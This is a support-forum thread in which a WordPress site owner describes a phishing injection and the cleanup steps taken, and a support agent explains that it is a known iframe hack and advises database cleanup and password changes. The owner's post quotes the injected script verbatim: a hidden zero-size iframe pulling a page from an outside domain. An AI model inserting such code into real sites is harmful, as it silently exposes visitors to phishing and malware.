|
Natalie Parisi
|
November 21, 2014 at 1:45 pm
Current site stats:
WordPress 4.0.1
Event Espresso 4.4.5p, no add-ons
WordPress auto-updated last night, then problem occurred, then EE4 upgraded and re-installed
Domain: shinteki.com
Our site running EE4 was attacked with some phishing code after the latest WordPress auto update last night. We’re trying to get things cleaned up so we can get the site cleared with Google.
Google reported that our compromised pages were our main page and the one event page we have generated through EE. These pages were injected with code from combatwriter.com, invoice-ups.net, and sweetcakesweb.net. We found and deleted the following code from wp-blog-header.php and haven’t been able to find any other references or usual files anywhere else:
<!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://adv.invoice-ups.net/stats.php" width="0" height="0" frameborder="0"\
></iframe>');</script><!-- counter -->
Things get a little tricky here, but these were my next basic steps trying to clean up any potential bad files in WordPress:
1. Updated all plug-ins
2. Installed Sucuri Security plug-in. Scan shows no malicious files.
3. Made a backup .zip using All-in-One WP Migration plugin. Chrome warns the backup .zip is malicious when I download it.
4. Deleted all WordPress files and did fresh re-installation.
5. Restored the backup file using All-in-One WP Migration plugin
6. Restoration caused errors in EE4 plugin. Deleted EE4. Errors stopped.
7. Generated a new backup .zip with All-in-One WP Migration and downloaded. This time, no Chrome warning about the file being malicious.
8. Re-installed EE4 via the WP plugin upload interface (plugin .zip downloaded directly from EE website). No errors this time.
9. Generated a new backup .zip with All-in-One WP Migration, but when I tried to download it, Google Chrome warned me that the file was malicious.
10. Sucuri Security scan still shows no malicious files on the site.
Using the All-in-One WP Migration as sort of a litmus test, the change from a non-malicious backup file to a malicious one only after EE4 is re-installed makes me wonder whether something in EE4 is involved with our phishing attack and is still an issue. Our EE4 was a few versions out of date when the attack happened, so I’m wondering if that had something to do with it.
Any guidance you have on this issue would be greatly appreciated. We don’t have much experience with WordPress hacking and want to make sure we get everything cleared up properly.
|
|
Josh
|
November 21, 2014 at 3:17 pm
Hi Natalie,
EE4 is not involved with the phishing attack. Other sites that do not run EE4 have reported the same attack where a general backdoor vulnerability allowed access to the web server and the attacker injected their scripts into post content. In your case, some iframe code was injected into an event page and your main page.
This is an attack that’s been around before Event Espresso was available as a plugin. Here is a link to notable discussion on this iframe hack vulnerability that was posted in the WordPress.org forums five years ago:
https://wordpress.org/support/topic/iframe-hack-on-several-wp-sites
If your backup files include a backup of the database, and if the database has the injected iframe code, then the database needs to be cleaned up as well. I recommend contacting Sucuri or another reputable developer who specializes in cleaning up sites to make sure thing get cleaned up.
I can also recommended to run scans on the PCs that FTP in or log in to your WordPress site. It’s also important to change the passwords for WordPress and FTP log ins.
|
